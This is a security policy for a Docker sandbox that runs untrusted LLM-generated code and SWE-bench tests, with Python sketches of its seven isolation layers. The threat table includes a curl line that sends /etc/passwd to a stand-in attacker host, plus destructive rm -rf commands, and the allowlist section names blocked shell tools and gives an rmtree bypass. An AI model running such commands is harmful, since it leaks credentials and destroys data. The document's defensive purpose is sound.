# Sandbox Security Policy
## Purpose
This document describes the security controls applied to the Docker-based code execution
sandbox used by the Autonomous Code Review & Bug-Fix Agent.
## Threat Model
The sandbox runs **untrusted LLM-generated code** and **arbitrary pytest test suites**
from public GitHub repositories. The risk categories are:
| Threat | Example | Control |
|--------|---------|---------|
| Data exfiltration | `curl https://attacker.com/$(cat /etc/passwd)` | `--network=none` |
| Resource exhaustion | Infinite loop / fork bomb | `--memory=2g`, `--cpus=2.0`, 60s timeout |
| Host filesystem access | `open('/etc/passwd')` | Only `/workspace` is bind-mounted from the host; `--read-only` root filesystem |
| Privilege escalation | `sudo rm -rf /` | Non-root user (uid=1000) |
| Malicious commands | `rm -rf /workspace` | Command whitelist |
| Persistent state | Writing outside /workspace | `--read-only` + limited tmpfs |
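Every control in the table maps to a `docker run` flag. The sketch below shows one way an executor might assemble them into a single argument vector. `build_docker_run_args` is a hypothetical helper, and the image name, mount layout and working directory are illustrative assumptions. This document does not specify the real executor's flag order or image.

```python
from pathlib import Path

def build_docker_run_args(image: str, workspace: Path, command: list[str]) -> list[str]:
    """Assemble a `docker run` argv that applies the sandbox controls.

    Hypothetical helper: flag values come from the threat table, while the
    image name, mount layout, and working directory are illustrative.
    """
    return [
        "docker", "run",
        "--rm",                    # remove the container when it exits
        "--network=none",          # loopback only: no DNS, no outbound traffic
        "--memory=2g",             # memory cgroup limit
        "--cpus=2.0",              # CPU quota equivalent to two CPUs
        "--read-only",             # read-only root filesystem
        "--tmpfs=/tmp:size=256m",  # small writable scratch space, discarded on exit
        "--user=1000:1000",        # non-root agent user
        "-v", f"{workspace.resolve()}:/workspace",  # only the per-run repo is mounted
        "-w", "/workspace",
        image,
        *command,
    ]
```

For example, the executor could call `subprocess.run(build_docker_run_args("sandbox-image:latest", workspace, ["pytest", "-x"]))`. Passing a list rather than a shell string means no host shell ever reinterprets the container command.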
## Security Controls (7 Layers)
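### 1. Network Isolation: `--network=none`
The container has **no external network access**. Only a loopback interface is configured, so there is no DNS resolution and there are no outbound HTTP or TCP connections.
This is the most important control. It prevents data exfiltration and blunts
supply-chain attacks from untrusted test dependencies, which cannot download further payloads or contact an external server.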
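A probe run inside the container is a quick way to confirm this layer. The sketch assumes Python is available in the image. The function names and the `1.1.1.1` target are illustrative choices. With `--network=none`, Docker configures only a loopback interface, so both a DNS lookup and a TCP connect to a public address are expected to fail.

```python
import socket

def dns_is_blocked(hostname: str = "example.com") -> bool:
    """True if the hostname cannot be resolved from this process."""
    try:
        socket.getaddrinfo(hostname, 443)
    except socket.gaierror:
        return True  # no reachable resolver (or the name does not exist)
    return False

def outbound_tcp_blocked(ip: str = "1.1.1.1", port: int = 443, timeout: float = 2.0) -> bool:
    """True if a TCP connection to ip:port cannot be established."""
    try:
        with socket.create_connection((ip, port), timeout=timeout):
            return False
    except OSError:
        return True  # e.g. "Network is unreachable" when only loopback exists
```

Inside the sandbox, `dns_is_blocked()` and `outbound_tcp_blocked()` should both return `True`. On a normally connected host they return `False`.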
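### 2. Memory cgroup: `--memory=2g`
If the container's memory usage exceeds 2 GB, the kernel OOM killer terminates processes inside it.
This keeps memory exhaustion from affecting the host. A fork bomb is bounded only indirectly, through memory pressure and the 60-second timeout. Docker's `--pids-limit` flag is the direct cap on process count.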
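An OOM kill and the timeout (layer 7) both end with SIGKILL. In that case `docker run` conventionally exits with status 137 (128 + 9). The sketch below shows how an executor might turn exit statuses into coarse labels. The `describe_exit` helper and its label strings are hypothetical; pytest's documented exit codes cover the non-killed case. The container runs with `--rm`, so it may be gone before `docker inspect` can report `State.OOMKilled`. Status 137 is therefore a heuristic, not proof of an OOM.

```python
SIGKILL = 9  # POSIX signal number; hard-coded so the sketch also imports on Windows

# pytest's documented exit codes.
PYTEST_EXIT_CODES = {
    0: "passed",
    1: "tests_failed",
    2: "interrupted",
    3: "internal_error",
    4: "usage_error",
    5: "no_tests_collected",
}

def describe_exit(returncode: int, timed_out: bool) -> str:
    """Map a `docker run ... pytest` exit status to a coarse, hypothetical label."""
    if timed_out:
        return "timeout"  # the executor's own deadline fired
    if returncode == 128 + SIGKILL:
        return "sigkill_probable_oom"  # 137 without a timeout: most likely the OOM killer
    return PYTEST_EXIT_CODES.get(returncode, f"exit_{returncode}")
```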
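### 3. CPU cgroup: `--cpus=2.0`
Caps the container at two CPUs' worth of CPU time. The cap is enforced through the CFS quota, and processes may still run on any core. This prevents CPU saturation that would
degrade other running containers or the host system.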
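The arithmetic behind `--cpus` is a CFS quota per scheduling period. Docker's documentation describes `--cpus=1.5` as equivalent to `--cpu-period=100000 --cpu-quota=150000`. The hypothetical helper below reproduces that conversion.

```python
def cpus_to_cfs(cpus: float, period_us: int = 100_000) -> tuple[int, int]:
    """Return the (cpu_period, cpu_quota) pair, in microseconds, equivalent to --cpus.

    The quota is the total CPU time the container may consume per period,
    summed over all cores it runs on; Docker's default period is 100 ms.
    """
    if cpus <= 0:
        raise ValueError("cpus must be positive")
    return period_us, round(cpus * period_us)
```

For `--cpus=2.0` this gives 200,000 µs of CPU time per 100,000 µs period. The quota is summed across cores, so four threads each using half a core reach the limit just as two fully busy threads do.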
### 4. Read-Only Filesystem: `--read-only --tmpfs=/tmp:size=256m`
The container's root filesystem is mounted read-only. There are only two writable locations:
- `/workspace`: the cloned repo (bind-mounted, scoped to this run)
- `/tmp`: tmpfs, 256 MB, wiped when the container exits
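A small probe can confirm which paths are actually writable from inside the container. `writable_locations` is a hypothetical helper, and the candidate list in the demo is an illustrative assumption. `--read-only` applies to the root filesystem only. Separate mounts, such as Docker's default `/dev/shm`, are worth including in the probe.

```python
import os
import tempfile

def writable_locations(candidates: list[str]) -> list[str]:
    """Return the directories in `candidates` that this process may write to.

    access(2) fails with EROFS for write checks on a read-only mount, so on the
    sandbox's read-only root filesystem only separate writable mounts remain.
    """
    return [p for p in candidates if os.path.isdir(p) and os.access(p, os.W_OK)]

if __name__ == "__main__":
    # gettempdir() resolves to /tmp inside the container when TMPDIR is unset.
    print(writable_locations(["/", "/etc", "/usr", "/workspace", tempfile.gettempdir(), "/dev/shm"]))
```

Inside the sandbox the result should contain only `/workspace` and `/tmp`, plus any separate tmpfs mounts the probe uncovers.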
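### 5. Command Whitelist: `ALLOWED_COMMANDS`
Before any command reaches Docker, the executor checks the base command name
against an allowlist: `{git, pytest, python, python3, pip, pip3, cat, ls, echo,
find, grep, head, tail, mkdir, cp, mv, touch, chmod}`.
Commands like `rm`, `curl`, `wget`, `bash`, `sh`, and `nc` are blocked at this layer. The check covers only the base command, so an allowed interpreter can still run arbitrary code (for example, `python -c "import shutil; shutil.rmtree('/workspace')"`). The remaining layers bound what such code can do.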
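A minimal sketch of a base-command check, assuming the command arrives as a shell-style string. Tokenizing it with `shlex.split` and taking `os.path.basename` of the first token is an assumption about how "base command name" is derived. The `is_allowed` function is hypothetical; only the `ALLOWED_COMMANDS` name and its contents come from this policy.

```python
import os
import shlex

# Allowlist contents as listed in the policy.
ALLOWED_COMMANDS = frozenset({
    "git", "pytest", "python", "python3", "pip", "pip3", "cat", "ls", "echo",
    "find", "grep", "head", "tail", "mkdir", "cp", "mv", "touch", "chmod",
})

def is_allowed(command: str) -> bool:
    """Check the base command name of a shell-style command string."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: reject rather than guess
        return False
    if not tokens:
        return False
    base = os.path.basename(tokens[0])  # "/usr/bin/curl" -> "curl"
    return base in ALLOWED_COMMANDS
```

This check is only meaningful if the resulting token list is handed to Docker as argv. If the original string were passed to a shell, `pytest && rm -rf /workspace` would pass the check and still run `rm`.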
### 6. Non-Root User: `uid=1000`
All processes run as `agent:agent` (`1000:1000`). If code gets past the
command whitelist, it still runs without root privileges and cannot modify root-owned system files.
### 7. Timeout: 60-Second SIGKILL
The executor enforces a 60-second hard timeout. When it expires, the container is stopped with
`docker stop --time=0`, which skips the grace period and sends SIGKILL immediately, so hung processes cannot consume
resources indefinitely.
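A minimal sketch of the timeout step, assuming the executor shells out to the Docker CLI through `subprocess` and starts the container with a known `--name`. Both are assumptions, and `run_with_timeout` is hypothetical. On timeout, `subprocess.run(..., timeout=...)` kills only the local `docker` client process. The container keeps running, which is why an explicit `docker stop --time=0` is still needed.

```python
import subprocess
import sys
from typing import Optional

def run_with_timeout(argv: list[str], timeout_s: float = 60.0,
                     container_name: Optional[str] = None) -> tuple[Optional[int], bool]:
    """Run argv with a hard deadline and return (returncode, timed_out).

    Hypothetical helper. On timeout, subprocess.run kills the local child
    (for example the `docker run` client), but that does not stop the
    container, so a named container is also stopped explicitly.
    """
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=timeout_s)
        return proc.returncode, False
    except subprocess.TimeoutExpired:
        if container_name is not None:
            # --time=0: no grace period before the daemon sends SIGKILL.
            subprocess.run(["docker", "stop", "--time=0", container_name],
                           capture_output=True, check=False)
        return None, True

if __name__ == "__main__":
    # Demo without Docker: a child that outlives a 1-second deadline.
    print(run_with_timeout([sys.executable, "-c", "import time; time.sleep(5)"], timeout_s=1.0))
```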
## Isolation Per Run
Each SWE-bench instance gets a **fresh temporary directory** as its workspace.
The container is created with `--rm` so it is automatically deleted after each run.
No state persists between runs.
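A per-run workspace can be sketched with the standard library's `tempfile.TemporaryDirectory`, which removes the directory on exit even if the run raises. The `fresh_workspace` helper and its directory prefix are hypothetical. The sketch also assumes the caller clones the repo into the yielded path and bind-mounts it as `/workspace`.

```python
import tempfile
from contextlib import contextmanager
from pathlib import Path
from typing import Iterator

@contextmanager
def fresh_workspace(instance_id: str) -> Iterator[Path]:
    """Yield an empty, per-instance directory and delete it afterwards.

    Hypothetical helper: the caller clones the repo into the yielded path and
    bind-mounts it as /workspace. Cleanup runs even if the run raises.
    """
    # Keep the prefix filesystem-safe whatever characters the ID contains.
    safe_id = "".join(c if c.isalnum() or c in "-_." else "_" for c in instance_id)
    with tempfile.TemporaryDirectory(prefix=f"sandbox-{safe_id}-") as tmp:
        yield Path(tmp)
```

Combined with `--rm` on the container, nothing from one instance is left on disk for the next.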
## Audit Log
Every command executed in the sandbox is logged with:
- instance_id
- command (truncated to first 3 tokens for brevity)
- returncode
- elapsed_seconds
- timed_out flag
Logs are emitted through `structlog` (JSON-formatted in production) and ingested by
the Prometheus/Grafana observability stack in Phase 8.
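The sketch below builds one entry with exactly the fields listed above and serializes it as a single JSON line. It uses only the standard library. In the real pipeline `structlog` handles rendering, for example through its `JSONRenderer` processor. The `audit_record` and `to_json_line` helpers are hypothetical, and joining the first three tokens with `shlex.join` is an assumption about how truncation is done.

```python
import json
import shlex
from typing import Optional

def audit_record(instance_id: str, argv: list[str], returncode: Optional[int],
                 elapsed_seconds: float, timed_out: bool) -> dict:
    """Build one audit-log entry with the fields listed in this policy (hypothetical helper)."""
    return {
        "instance_id": instance_id,
        "command": shlex.join(argv[:3]),  # first 3 tokens only
        "returncode": returncode,         # None if no exit status was obtained
        "elapsed_seconds": round(elapsed_seconds, 3),
        "timed_out": timed_out,
    }

def to_json_line(record: dict) -> str:
    """Serialize one entry as a single JSON object on one line (JSON Lines)."""
    return json.dumps(record, sort_keys=True)
```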
## Known Limitations
- **Conda environments**: Some SWE-bench repos require specific conda environments
  with compiled C extensions. The current sandbox installs dependencies with pip only, so tests may
  fail for repos with complex native dependencies.
- **Docker-in-Docker**: The sandbox does not support running Docker inside Docker.
  Repos whose tests call Docker from a subprocess will fail, because the Docker daemon is unreachable from inside the sandbox.
- **Flaky tests**: ~8% of SWE-bench issues have non-deterministic tests. These can
  consume retries even when the patch is correct. Such failures are flagged under the `flaky_test` category.
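This policy does not describe how flaky tests are detected. One common approach is to rerun the same test on the same patch and compare outcomes. The sketch below is a hypothetical rule along those lines, not the agent's actual classifier. Mixed pass/fail results on identical code point at the test rather than the patch.

```python
def classify_reruns(outcomes: list[bool]) -> str:
    """Label repeated runs of one test on one patch (True = passed).

    Hypothetical rule: mixed results on identical code mean the test itself
    is non-deterministic, so the failure is not blamed on the patch.
    """
    if not outcomes:
        raise ValueError("need at least one run")
    if all(outcomes):
        return "pass"
    if not any(outcomes):
        return "fail"
    return "flaky_test"
```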